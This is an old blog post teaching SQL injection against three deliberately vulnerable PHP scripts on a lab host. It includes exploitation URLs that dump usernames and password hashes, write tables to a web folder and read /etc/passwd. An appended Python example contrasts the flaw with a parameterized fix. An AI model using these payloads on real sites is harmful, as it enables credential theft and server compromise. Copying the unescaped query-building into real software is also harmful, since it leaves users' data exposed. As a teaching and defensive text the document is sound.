Andi Live Is Here

My Live Is My Future

May 21st, 2008 by Admin

-== WEB HACKING IN ACTION PART I==-

PHP - MYSQL : SQL INJECTION
—————————-

(Dumping MySQL Database)

CREATE TABLE `userlist` (
`id` tinyint(6) NOT NULL auto_increment,
`username` varchar(28) NOT NULL,
`status` varchar(28) NOT NULL,
`password` varchar(48) NOT NULL,
`creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
`nama_lengkap` varchar(128) NOT NULL,
`status_id` tinyint(6) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;


-- Dumping data for table `userlist`

INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES
(1, 'anxx', 'administrator', '8a1465884c097cfa30e332c57exxxxxx', '2007-05-15 21:18:08', 'anxxx nightlogin', 1),
(2, 'kaxxxx', 'operator', '8a1465884c097cfa30e332c57xxxxxx', '2007-05-04 21:18:31', 'kaxxxx poseidon', 2),
(3, 'bxxx', 'operator', 'b3f85374ebbdb228c0ad76cd6axxxxxx', '2007-05-04 16:51:32', 'Bxxx Erlangga', 2),
(4, 'haxxx', 'operator', 'daa526517139536f056efbb8exxxxxx', '2007-05-04 20:13:31', 'Haxxx pekok', 2);

#############
# SCENARIO 1
#############

<?php
$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
die("Error ndan!!");
}

// Scenario 1: the request parameter is pasted into a single-quoted literal
// with no escaping or validation, so a quote in the value closes the literal
// and the rest of the value becomes SQL.
$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE id='$dbid'";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."<br>";
echo "Username : ".$row->username."<br>";
echo "Status :".$row->status."<br>";
echo "\n";

?>

Exploitation:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2' and 'a'='a
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2' union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1'%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2'%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1'%20union%20select%201,1,1,1,1,1,load_file('/etc/passwd')%20into%20outfile%20'/var/www/users/kaiten/PENTEST/pwdx.txt'/*

#############
# SCENARIO 2
#############

<?php
$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
die("Error ndan!!");
}

// Scenario 2: the parameter is interpolated as a bare number. No quote is
// needed to alter the query, so quote-escaping (magic_quotes_gpc, addslashes)
// would not help here; only validation or a bound parameter would.
$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE id=$dbid";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."<br>";
echo "Username : ".$row->username."<br>";
echo "Status :".$row->status."<br>";
echo "\n";
?>

Exploitation:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt'
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file('/etc/passwd')%20into%20outfile%20'/var/www/users/kaiten/PENTEST/pwd.txt'

#############
# SCENARIO 3
#############

<?php
$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
die("Error ndan!!");
}

// Scenario 3: the quoted literal sits inside parentheses, so a value has to
// close both the quote and the parenthesis before it can change the query.
// The root cause is the same as scenario 1: unescaped string interpolation.
$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE (id='$dbid')";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."<br>";
echo "Username : ".$row->username."<br>";
echo "Status :".$row->status."<br>";
echo "\n";

?>

Exploitation:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1')%20and%201=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2') union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1')%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2')%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt'/*

Note :
/var/www/users/kaiten/PENTEST/ is world-writable (permission 777)
magic_quotes_gpc = Off
I'm really lame at SQL injection :((
Author : Ph03n1X
URL : http://kandangjamur.net
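The three scenarios above differ only in how the id is embedded in the query text, which is why each payload has to close a different context (a quote, nothing, or a quote plus a parenthesis). The following is an added Python example, not code from the original post: it rebuilds the post's `userlist` table in SQLite (constructed rows, redacted hashes replaced by placeholders), renders each scenario's query exactly the way the PHP concatenation does, and contrasts it with a validated, parameterized lookup. SQLite stands in for MySQL, so INTO OUTFILE and LOAD_FILE are out of scope.

```python
"""Added example (not from the original post). SQLite stands in for MySQL."""
import re
import sqlite3

# The three query templates exactly as the post's three scenarios build them.
TEMPLATES = {
    1: "SELECT * FROM userlist WHERE id='{}'",    # scenario 1: quoted literal
    2: "SELECT * FROM userlist WHERE id={}",      # scenario 2: bare number
    3: "SELECT * FROM userlist WHERE (id='{}')",  # scenario 3: quoted, in parentheses
}

def make_db():
    """In-memory copy of the post's userlist table with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("""CREATE TABLE userlist (id INTEGER PRIMARY KEY, username TEXT,
        status TEXT, password TEXT, creation_date TEXT, nama_lengkap TEXT,
        status_id INTEGER)""")
    con.executemany("INSERT INTO userlist VALUES (?,?,?,?,?,?,?)", [
        (1, "anxx", "administrator", "HASH-REDACTED-1", "2007-05-15 21:18:08", "anxxx nightlogin", 1),
        (2, "kaxxxx", "operator", "HASH-REDACTED-2", "2007-05-04 21:18:31", "kaxxxx poseidon", 2),
    ])
    return con

def render_query(scenario, user_value):
    """The SQL the vulnerable PHP actually sends: the value is pasted into the text."""
    return TEMPLATES[scenario].format(user_value)

def vulnerable_lookup(con, scenario, user_value):
    """String interpolation as in the post; a crafted value rewrites the query."""
    return con.execute(render_query(scenario, user_value)).fetchall()

def safe_lookup(con, user_value):
    """Hardened form: accept only a short ASCII integer (tinyint(6) in the post's
    schema), then bind it as a parameter so it can only ever be a value."""
    if not re.fullmatch(r"[0-9]{1,6}", user_value):
        raise ValueError("id must be a 1-6 digit integer")
    return con.execute("SELECT * FROM userlist WHERE id=?", (int(user_value),)).fetchall()

if __name__ == "__main__":
    con = make_db()
    # scenario 2 boolean test from the post: the row vanishes although id 2 exists
    print(render_query(2, "2 and 1=0"), "->", vulnerable_lookup(con, 2, "2 and 1=0"))
    # scenario 3: the value must close both the quote and the parenthesis
    q3 = "-1') or ('a'='a"
    print(render_query(3, q3), "->", len(vulnerable_lookup(con, 3, q3)), "rows")
    # the hardened lookup rejects every non-numeric id before it reaches SQL
    print(safe_lookup(con, "2"))
```

Note that quote-escaping alone (the magic_quotes_gpc setting mentioned above) would only affect scenarios 1 and 3; the bare-number template of scenario 2 is why validation plus parameter binding, not escaping, is the fix.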

NB From Me :

If there are mistakes in this article, try opening the one below :D

http://andi.lp3i.net/tools/sql-inject.txt

3 Responses to "Php Injection In Action"

great.. great...
to Andi, nice to meet you, from LP3I Bekasi....

peace yoo
